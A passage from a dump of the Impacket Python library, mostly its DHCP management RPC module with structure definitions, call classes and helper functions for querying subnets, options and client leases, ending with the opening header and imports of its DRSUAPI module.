DHCP_CLIENT_INFO_ARRAY_V5),\n )\n\nclass LPDHCP_CLIENT_INFO_ARRAY_V4(NDRPOINTER):\n referent = (\n ('Data', DHCP_CLIENT_INFO_ARRAY_V4),\n )\n\nclass DHCP_IP_ADDRESS_ARRAY(NDRUniConformantArray):\n item = DHCP_IP_ADDRESS\n\nclass LPDHCP_IP_ADDRESS_ARRAY(NDRPOINTER):\n referent = (\n ('Data', DHCP_IP_ADDRESS_ARRAY),\n )\n\nclass DHCP_IP_ARRAY(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Elements', LPDHCP_IP_ADDRESS_ARRAY),\n )\n\nclass DHCP_SUBNET_STATE(NDRENUM):\n class enumItems(Enum):\n DhcpSubnetEnabled = 0\n DhcpSubnetDisabled = 1\n DhcpSubnetEnabledSwitched = 2\n DhcpSubnetDisabledSwitched = 3\n DhcpSubnetInvalidState = 4\n\nclass DHCP_SUBNET_INFO(NDRSTRUCT):\n structure = (\n ('SubnetAddress', DHCP_IP_ADDRESS),\n ('SubnetMask', DHCP_IP_MASK),\n ('SubnetName', LPWSTR),\n ('SubnetComment', LPWSTR),\n ('PrimaryHost', DHCP_HOST_INFO),\n ('SubnetState', DHCP_SUBNET_STATE),\n )\n\nclass LPDHCP_SUBNET_INFO(NDRPOINTER):\n referent = (\n ('Data', DHCP_SUBNET_INFO),\n )\n\nclass DHCP_OPTION_SCOPE_TYPE(NDRENUM):\n class enumItems(Enum):\n DhcpDefaultOptions = 0\n DhcpGlobalOptions = 1\n DhcpSubnetOptions = 2\n DhcpReservedOptions = 3\n DhcpMScopeOptions = 4\n\nclass DHCP_RESERVED_SCOPE(NDRSTRUCT):\n structure = (\n ('ReservedIpAddress', DHCP_IP_ADDRESS),\n ('ReservedIpSubnetAddress', DHCP_IP_ADDRESS),\n )\n\nclass DHCP_OPTION_SCOPE_UNION(NDRUNION):\n union = {\n DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions : (),\n DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions : (),\n DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions : ('SubnetScopeInfo', DHCP_IP_ADDRESS),\n DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions : ('ReservedScopeInfo', DHCP_RESERVED_SCOPE),\n DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions : ('MScopeInfo', LPWSTR),\n }\n\nclass DHCP_OPTION_SCOPE_INFO(NDRSTRUCT):\n structure = (\n ('ScopeType', DHCP_OPTION_SCOPE_TYPE),\n ('ScopeInfo', DHCP_OPTION_SCOPE_UNION),\n )\n\nclass LPDHCP_OPTION_SCOPE_INFO(NDRPOINTER):\n referent = (\n ('Data', DHCP_OPTION_SCOPE_INFO)\n )\n\nclass DWORD_DWORD(NDRSTRUCT):\n structure = (\n ('DWord1', DWORD),\n ('DWord2', DWORD),\n )\n\nclass DHCP_BOOTP_IP_RANGE(NDRSTRUCT):\n structure = (\n ('StartAddress', DHCP_IP_ADDRESS),\n ('EndAddress', DHCP_IP_ADDRESS),\n ('BootpAllocated', ULONG),\n ('MaxBootpAllowed', DHCP_IP_ADDRESS),\n ('MaxBootpAllowed', ULONG ),\n )\n\nclass DHCP_IP_RESERVATION_V4(NDRSTRUCT):\n structure = (\n ('ReservedIpAddress', DHCP_IP_ADDRESS),\n ('ReservedForClient', DHCP_CLIENT_UID),\n ('bAllowedClientTypes', BYTE),\n )\n\nclass DHCP_IP_RANGE(NDRSTRUCT):\n structure = (\n ('StartAddress', DHCP_IP_ADDRESS),\n ('EndAddress', DHCP_IP_ADDRESS),\n )\n\nclass DHCP_IP_CLUSTER(NDRSTRUCT):\n structure = (\n ('ClusterAddress', DHCP_IP_ADDRESS),\n ('ClusterMask', DWORD),\n )\n\nclass DHCP_SUBNET_ELEMENT_TYPE(NDRENUM):\n class enumItems(Enum):\n DhcpIpRanges = 0\n DhcpSecondaryHosts = 1\n DhcpReservedIps = 2\n DhcpExcludedIpRanges = 3\n DhcpIpUsedClusters = 4\n DhcpIpRangesDhcpOnly = 5\n DhcpIpRangesDhcpBootp = 6\n DhcpIpRangesBootpOnly = 7\n\nclass DHCP_SUBNET_ELEMENT_UNION_V5(NDRUNION):\n union = {\n DHCP_SUBNET_ELEMENT_TYPE.DhcpIpRanges : ('IpRange', DHCP_BOOTP_IP_RANGE),\n DHCP_SUBNET_ELEMENT_TYPE.DhcpSecondaryHosts : ('SecondaryHost', DHCP_HOST_INFO),\n DHCP_SUBNET_ELEMENT_TYPE.DhcpReservedIps : ('ReservedIp', DHCP_IP_RESERVATION_V4),\n DHCP_SUBNET_ELEMENT_TYPE.DhcpExcludedIpRanges : ('ExcludeIpRange', DHCP_IP_RANGE),\n DHCP_SUBNET_ELEMENT_TYPE.DhcpIpUsedClusters : ('IpUsedCluster', DHCP_IP_CLUSTER),\n }\n\nclass DHCP_SUBNET_ELEMENT_DATA_V5(NDRSTRUCT):\n structure = (\n ('ElementType', DHCP_SUBNET_ELEMENT_TYPE),\n ('Element', DHCP_SUBNET_ELEMENT_UNION_V5),\n )\n\nclass LPDHCP_SUBNET_ELEMENT_DATA_V5(NDRUniConformantArray):\n item = DHCP_SUBNET_ELEMENT_DATA_V5\n\nclass DHCP_SUBNET_ELEMENT_INFO_ARRAY_V5(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Elements', LPDHCP_SUBNET_ELEMENT_DATA_V5),\n )\n\nclass LPDHCP_SUBNET_ELEMENT_INFO_ARRAY_V5(NDRPOINTER):\n referent = (\n ('Data', DHCP_SUBNET_ELEMENT_INFO_ARRAY_V5)\n )\n\nclass DHCP_OPTION_DATA_TYPE(NDRENUM):\n class enumItems(Enum):\n DhcpByteOption = 0\n DhcpWordOption = 1\n DhcpDWordOption = 2\n DhcpDWordDWordOption = 3\n DhcpIpAddressOption = 4\n DhcpStringDataOption = 5\n DhcpBinaryDataOption = 6\n DhcpEncapsulatedDataOption = 7\n DhcpIpv6AddressOption = 8\n\nclass DHCP_OPTION_ELEMENT_UNION(NDRUNION):\n commonHdr = (\n ('tag', DHCP_OPTION_DATA_TYPE),\n )\n union = {\n DHCP_OPTION_DATA_TYPE.DhcpByteOption : ('ByteOption', BYTE),\n DHCP_OPTION_DATA_TYPE.DhcpWordOption : ('WordOption', WORD),\n DHCP_OPTION_DATA_TYPE.DhcpDWordOption : ('DWordOption', DWORD),\n DHCP_OPTION_DATA_TYPE.DhcpDWordDWordOption : ('DWordDWordOption', DWORD_DWORD),\n DHCP_OPTION_DATA_TYPE.DhcpIpAddressOption : ('IpAddressOption', DHCP_IP_ADDRESS),\n DHCP_OPTION_DATA_TYPE.DhcpStringDataOption : ('StringDataOption', LPWSTR),\n DHCP_OPTION_DATA_TYPE.DhcpBinaryDataOption : ('BinaryDataOption', DHCP_BINARY_DATA),\n DHCP_OPTION_DATA_TYPE.DhcpEncapsulatedDataOption: ('EncapsulatedDataOption', DHCP_BINARY_DATA),\n DHCP_OPTION_DATA_TYPE.DhcpIpv6AddressOption : ('Ipv6AddressDataOption', LPWSTR),\n }\n\nclass DHCP_OPTION_DATA_ELEMENT(NDRSTRUCT):\n structure = (\n ('OptionType', DHCP_OPTION_DATA_TYPE),\n ('Element', DHCP_OPTION_ELEMENT_UNION),\n )\n\nclass DHCP_OPTION_DATA_ELEMENT_ARRAY2(NDRUniConformantArray):\n item = DHCP_OPTION_DATA_ELEMENT\n\nclass LPDHCP_OPTION_DATA_ELEMENT(NDRPOINTER):\n referent = (\n ('Data', DHCP_OPTION_DATA_ELEMENT_ARRAY2),\n )\n\nclass DHCP_OPTION_DATA(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Elements', LPDHCP_OPTION_DATA_ELEMENT),\n )\n\nclass DHCP_OPTION_VALUE(NDRSTRUCT):\n structure = (\n ('OptionID', DHCP_OPTION_ID),\n ('Value', DHCP_OPTION_DATA),\n )\n\nclass PDHCP_OPTION_VALUE(NDRPOINTER):\n referent = (\n ('Data', DHCP_OPTION_VALUE),\n )\n\nclass DHCP_OPTION_VALUE_ARRAY2(NDRUniConformantArray):\n item = DHCP_OPTION_VALUE\n\nclass LPDHCP_OPTION_VALUE(NDRPOINTER):\n referent = (\n ('Data', DHCP_OPTION_VALUE_ARRAY2),\n )\n\nclass DHCP_OPTION_VALUE_ARRAY(NDRSTRUCT):\n structure = (\n ('NumElements', DWORD),\n ('Values', LPDHCP_OPTION_VALUE),\n )\n\nclass LPDHCP_OPTION_VALUE_ARRAY(NDRPOINTER):\n referent = (\n ('Data', DHCP_OPTION_VALUE_ARRAY),\n )\n\nclass DHCP_ALL_OPTION_VALUES(NDRSTRUCT):\n structure = (\n ('ClassName', LPWSTR),\n ('VendorName', LPWSTR),\n ('IsVendor', BOOL),\n ('OptionsArray', LPDHCP_OPTION_VALUE_ARRAY),\n )\n\nclass OPTION_VALUES_ARRAY(NDRUniConformantArray):\n item = DHCP_ALL_OPTION_VALUES\n\nclass LPOPTION_VALUES_ARRAY(NDRPOINTER):\n referent = (\n ('Data', OPTION_VALUES_ARRAY),\n )\n\nclass DHCP_ALL_OPTIONS_VALUES(NDRSTRUCT):\n structure = (\n ('Flags', DWORD),\n ('NumElements', DWORD),\n ('Options', LPOPTION_VALUES_ARRAY),\n )\n\nclass LPDHCP_ALL_OPTION_VALUES(NDRPOINTER):\n referent = (\n ('Data', DHCP_ALL_OPTIONS_VALUES),\n )\n\n################################################################################\n# RPC CALLS\n################################################################################\n# Interface dhcpsrv\nclass DhcpGetSubnetInfo(NDRCALL):\n opnum = 2\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SubnetAddress', DHCP_IP_ADDRESS),\n )\n\nclass DhcpGetSubnetInfoResponse(NDRCALL):\n structure = (\n ('SubnetInfo', LPDHCP_SUBNET_INFO),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpEnumSubnets(NDRCALL):\n opnum = 3\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('ResumeHandle', LPDWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumSubnetsResponse(NDRCALL):\n structure = (\n ('ResumeHandle', LPDWORD),\n ('EnumInfo', DHCP_IP_ARRAY),\n ('EnumRead', DWORD),\n ('EnumTotal', DWORD),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpGetOptionValue(NDRCALL):\n opnum = 13\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('OptionID', DHCP_OPTION_ID),\n ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),\n )\n\nclass DhcpGetOptionValueResponse(NDRCALL):\n structure = (\n ('OptionValue', PDHCP_OPTION_VALUE),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpEnumOptionValues(NDRCALL):\n opnum = 14\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),\n ('ResumeHandle', LPDWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumOptionValuesResponse(NDRCALL):\n structure = (\n ('ResumeHandle', DWORD),\n ('OptionValues', LPDHCP_OPTION_VALUE_ARRAY),\n ('OptionsRead', DWORD),\n ('OptionsTotal', DWORD),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpGetClientInfoV4(NDRCALL):\n opnum = 34\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SearchInfo', DHCP_SEARCH_INFO),\n )\n\nclass DhcpGetClientInfoV4Response(NDRCALL):\n structure = (\n ('ClientInfo', LPDHCP_CLIENT_INFO_V4),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpEnumSubnetClientsV4(NDRCALL):\n opnum = 35\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SubnetAddress', DHCP_IP_ADDRESS),\n ('ResumeHandle', DWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumSubnetClientsV4Response(NDRCALL):\n structure = (\n ('ResumeHandle', LPDWORD),\n ('ClientInfo', LPDHCP_CLIENT_INFO_ARRAY_V4),\n ('ClientsRead', DWORD),\n ('ClientsTotal', DWORD),\n ('ErrorCode', ULONG),\n )\n\n# Interface dhcpsrv2\n\nclass DhcpEnumSubnetClientsV5(NDRCALL):\n opnum = 0\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SubnetAddress', DHCP_IP_ADDRESS),\n ('ResumeHandle', LPDWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumSubnetClientsV5Response(NDRCALL):\n structure = (\n ('ResumeHandle', DWORD),\n ('ClientsInfo', LPDHCP_CLIENT_INFO_ARRAY_V5),\n ('ClientsRead', DWORD),\n ('ClientsTotal', DWORD),\n )\n\nclass DhcpGetOptionValueV5(NDRCALL):\n opnum = 21\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('Flags', DWORD),\n ('OptionID', DHCP_OPTION_ID),\n ('ClassName', LPWSTR),\n ('VendorName', LPWSTR),\n ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),\n )\n\nclass DhcpGetOptionValueV5Response(NDRCALL):\n structure = (\n ('OptionValue', PDHCP_OPTION_VALUE),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpEnumOptionValuesV5(NDRCALL):\n opnum = 22\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('Flags', DWORD),\n ('ClassName', LPWSTR),\n ('VendorName', LPWSTR),\n ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),\n ('ResumeHandle', LPDWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumOptionValuesV5Response(NDRCALL):\n structure = (\n ('ResumeHandle', DWORD),\n ('OptionValues', LPDHCP_OPTION_VALUE_ARRAY),\n ('OptionsRead', DWORD),\n ('OptionsTotal', DWORD),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpGetAllOptionValues(NDRCALL):\n opnum = 30\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('Flags', DWORD),\n ('ScopeInfo', DHCP_OPTION_SCOPE_INFO),\n )\n\nclass DhcpGetAllOptionValuesResponse(NDRCALL):\n structure = (\n ('Values', LPDHCP_ALL_OPTION_VALUES),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpEnumSubnetElementsV5(NDRCALL):\n opnum = 38\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SubnetAddress', DHCP_IP_ADDRESS),\n ('EnumElementType', DHCP_SUBNET_ELEMENT_TYPE),\n ('ResumeHandle', LPDWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumSubnetElementsV5Response(NDRCALL):\n structure = (\n ('ResumeHandle', DWORD),\n ('EnumElementInfo', LPDHCP_SUBNET_ELEMENT_INFO_ARRAY_V5),\n ('ElementsRead', DWORD),\n ('ElementsTotal', DWORD),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpEnumSubnetClientsVQ(NDRCALL):\n opnum = 47\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SubnetAddress', DHCP_IP_ADDRESS),\n ('ResumeHandle', LPDWORD),\n ('PreferredMaximum', DWORD),\n )\n\nclass DhcpEnumSubnetClientsVQResponse(NDRCALL):\n structure = (\n ('ResumeHandle', LPDWORD),\n ('ClientInfo', LPDHCP_CLIENT_INFO_ARRAY_VQ),\n ('ClientsRead', DWORD),\n ('ClientsTotal', DWORD),\n ('ErrorCode', ULONG),\n )\n\nclass DhcpV4GetClientInfo(NDRCALL):\n opnum = 123\n structure = (\n ('ServerIpAddress', DHCP_SRV_HANDLE),\n ('SearchInfo', DHCP_SEARCH_INFO),\n )\n\nclass DhcpV4GetClientInfoResponse(NDRCALL):\n structure = (\n ('ClientInfo', LPDHCP_CLIENT_INFO_PB),\n ('ErrorCode', ULONG),\n )\n\n################################################################################\n# OPNUMs and their corresponding structures\n################################################################################\nOPNUMS = {\n 0: (DhcpEnumSubnetClientsV5, DhcpEnumSubnetClientsV5Response),\n 2: (DhcpGetSubnetInfo, DhcpGetSubnetInfoResponse),\n 3: (DhcpEnumSubnets, DhcpEnumSubnetsResponse),\n 13: (DhcpGetOptionValue, DhcpGetOptionValueResponse),\n 14: (DhcpEnumOptionValues, DhcpEnumOptionValuesResponse),\n 21: (DhcpGetOptionValueV5, DhcpGetOptionValueV5Response),\n 22: (DhcpEnumOptionValuesV5, DhcpEnumOptionValuesV5Response),\n 30: (DhcpGetAllOptionValues, DhcpGetAllOptionValuesResponse),\n 34: (DhcpGetClientInfoV4, DhcpGetClientInfoV4Response),\n 35: (DhcpEnumSubnetClientsV4, DhcpEnumSubnetClientsV4Response),\n 38: (DhcpEnumSubnetElementsV5, DhcpEnumSubnetElementsV5Response),\n 47: (DhcpEnumSubnetClientsVQ, DhcpEnumSubnetClientsVQResponse),\n 123: (DhcpV4GetClientInfo, DhcpV4GetClientInfoResponse),\n}\n\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\ndef hDhcpGetClientInfoV4(dce, searchType, searchValue):\n request = DhcpGetClientInfoV4()\n\n request['ServerIpAddress'] = NULL\n request['SearchInfo']['SearchType'] = searchType\n request['SearchInfo']['SearchInfo']['tag'] = searchType\n if searchType == DHCP_SEARCH_INFO_TYPE.DhcpClientIpAddress:\n request['SearchInfo']['SearchInfo']['ClientIpAddress'] = searchValue\n elif searchType == DHCP_SEARCH_INFO_TYPE.DhcpClientHardwareAddress:\n # This should be a DHCP_BINARY_DATA\n request['SearchInfo']['SearchInfo']['ClientHardwareAddress'] = searchValue\n else:\n request['SearchInfo']['SearchInfo']['ClientName'] = searchValue\n\n return dce.request(request)\n\ndef hDhcpGetSubnetInfo(dce, subnetaddress):\n request = DhcpGetSubnetInfo()\n\n request['ServerIpAddress'] = NULL\n request['SubnetAddress'] = subnetaddress\n resp = dce.request(request)\n\n return resp\n\ndef hDhcpGetOptionValue(dce, optionID, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL):\n request = DhcpGetOptionValue()\n\n request['ServerIpAddress'] = NULL\n request['OptionID'] = optionID\n request['ScopeInfo']['ScopeType'] = scopetype\n if scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions and scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions:\n request['ScopeInfo']['ScopeInfo']['tag'] = scopetype\n if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:\n request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:\n request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:\n request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options\n\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('ERROR_NO_MORE_ITEMS') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumOptionValues(dce, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL,\n preferredMaximum=0xffffffff):\n request = DhcpEnumOptionValues()\n\n request['ServerIpAddress'] = NULL\n request['ScopeInfo']['ScopeType'] = scopetype\n if scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions and scopetype != DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions:\n request['ScopeInfo']['ScopeInfo']['tag'] = scopetype\n if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:\n request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:\n request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:\n request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('ERROR_NO_MORE_ITEMS') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumOptionValuesV5(dce, flags=DHCP_FLAGS_OPTION_DEFAULT, classname=NULL, vendorname=NULL,\n scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL,\n preferredMaximum=0xffffffff):\n request = DhcpEnumOptionValuesV5()\n\n request['ServerIpAddress'] = NULL\n request['Flags'] = flags\n request['ClassName'] = classname\n request['VendorName'] = vendorname\n request['ScopeInfo']['ScopeType'] = scopetype\n request['ScopeInfo']['ScopeInfo']['tag'] = scopetype\n if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:\n request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:\n request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:\n request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('ERROR_NO_MORE_ITEMS') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpGetOptionValueV5(dce, option_id, flags=DHCP_FLAGS_OPTION_DEFAULT, classname=NULL, vendorname=NULL,\n scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL):\n request = DhcpGetOptionValueV5()\n\n request['ServerIpAddress'] = NULL\n request['Flags'] = flags\n request['OptionID'] = option_id\n request['ClassName'] = classname\n request['VendorName'] = vendorname\n request['ScopeInfo']['ScopeType'] = scopetype\n request['ScopeInfo']['ScopeInfo']['tag'] = scopetype\n if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:\n request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:\n request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:\n request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options\n\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('ERROR_NO_MORE_ITEMS') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpGetAllOptionValues(dce, scopetype=DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions, options=NULL):\n request = DhcpGetAllOptionValues()\n\n request['ServerIpAddress'] = NULL\n request['Flags'] = NULL\n request['ScopeInfo']['ScopeType'] = scopetype\n request['ScopeInfo']['ScopeInfo']['tag'] = scopetype\n if scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions:\n request['ScopeInfo']['ScopeInfo']['SubnetScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions:\n request['ScopeInfo']['ScopeInfo']['ReservedScopeInfo'] = options\n elif scopetype == DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions:\n request['ScopeInfo']['ScopeInfo']['MScopeInfo'] = options\n\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('ERROR_NO_MORE_ITEMS') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumSubnets(dce, preferredMaximum=0xffffffff):\n request = DhcpEnumSubnets()\n\n request['ServerIpAddress'] = NULL\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumSubnetClientsVQ(dce, preferredMaximum=0xffffffff):\n request = DhcpEnumSubnetClientsVQ()\n\n request['ServerIpAddress'] = NULL\n request['SubnetAddress'] = NULL\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumSubnetClientsV4(dce, preferredMaximum=0xffffffff):\n request = DhcpEnumSubnetClientsV4()\n\n request['ServerIpAddress'] = NULL\n request['SubnetAddress'] = NULL\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumSubnetClientsV5(dce, subnetAddress=0, preferredMaximum=0xffffffff):\n request = DhcpEnumSubnetClientsV5()\n\n request['ServerIpAddress'] = NULL\n request['SubnetAddress'] = subnetAddress\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCSessionError as e:\n if str(e).find('STATUS_MORE_ENTRIES') < 0:\n raise\n resp = e.get_packet()\n return resp\n\ndef hDhcpEnumSubnetElementsV5(dce, subnet_address, element_type=DHCP_SUBNET_ELEMENT_TYPE.DhcpIpRanges, preferredMaximum=0xffffffff):\n request = DhcpEnumSubnetElementsV5()\n\n request['ServerIpAddress'] = NULL\n request['SubnetAddress'] = subnet_address\n request['EnumElementType'] = element_type\n request['ResumeHandle'] = NULL\n request['PreferredMaximum'] = preferredMaximum\n\n status = system_errors.ERROR_MORE_DATA\n while status == system_errors.ERROR_MORE_DATA:\n try:\n resp = dce.request(request)\n except DCERPCException as e:\n if str(e).find('ERROR_NO_MORE_ITEMS') < 0:\n raise\n resp = e.get_packet()\n return resp\n" }, { "path": "impacket/dcerpc/v5/drsuapi.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-DRSR] Directory Replication Service (DRS) DRSUAPI Interface implementation\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom builtins import bytes\nimport hashlib\nfrom struct import pack\nimport six\nfrom six import PY2\n\nfrom impacket import LOG\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUNION, NDR, NDRENUM\nfrom impacket.dcerpc.v5.dtypes import PUUID, DWORD, NULL, GUID, LPWSTR, BOOL, ULONG, UUID, LONGLONG, ULARGE_INTEGER, LARGE_INTEGER\nfrom impacket import hresult_errors, system_errors\nfrom impacket.structure import Structure\nfrom impacket.uuid import uuidtup_to_bin, string_to_bin\nfrom impacket.dcerpc.v5.enum import Enum\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.krb5 import crypto\nfrom pyasn1.type import univ\nfrom pyasn1.codec.ber import decoder\nfrom impacket.crypto import transformKey\n\ntry:\n from Cryptodome.Cipher import ARC4, DES\nexcept Exception:\n LOG.critical(\"Warning: You don't have any crypto installed. You need pycryptodomex\")\n LOG.critical(\"See https://pypi.org/project/pycryptodomex/\")\n\nMSRPC_UUID_DRSUAPI = uuidtup_to_bin(('E3514235-4B06-11D1-AB04-00C04FC2DCD2','4.0'))\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n key = self.error_code\n if key in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]\n return 'DRSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n elif key & 0xffff in system_errors.ERROR_MESSAGES:\n error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]\n error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]\n return 'DRSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'DRSR SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 4.1.10.2.17 EXOP_ERR Codes\nclass EXOP_ERR(NDRENUM):\n align = 4\n align64 = 4\n structure = (\n ('Data', '= 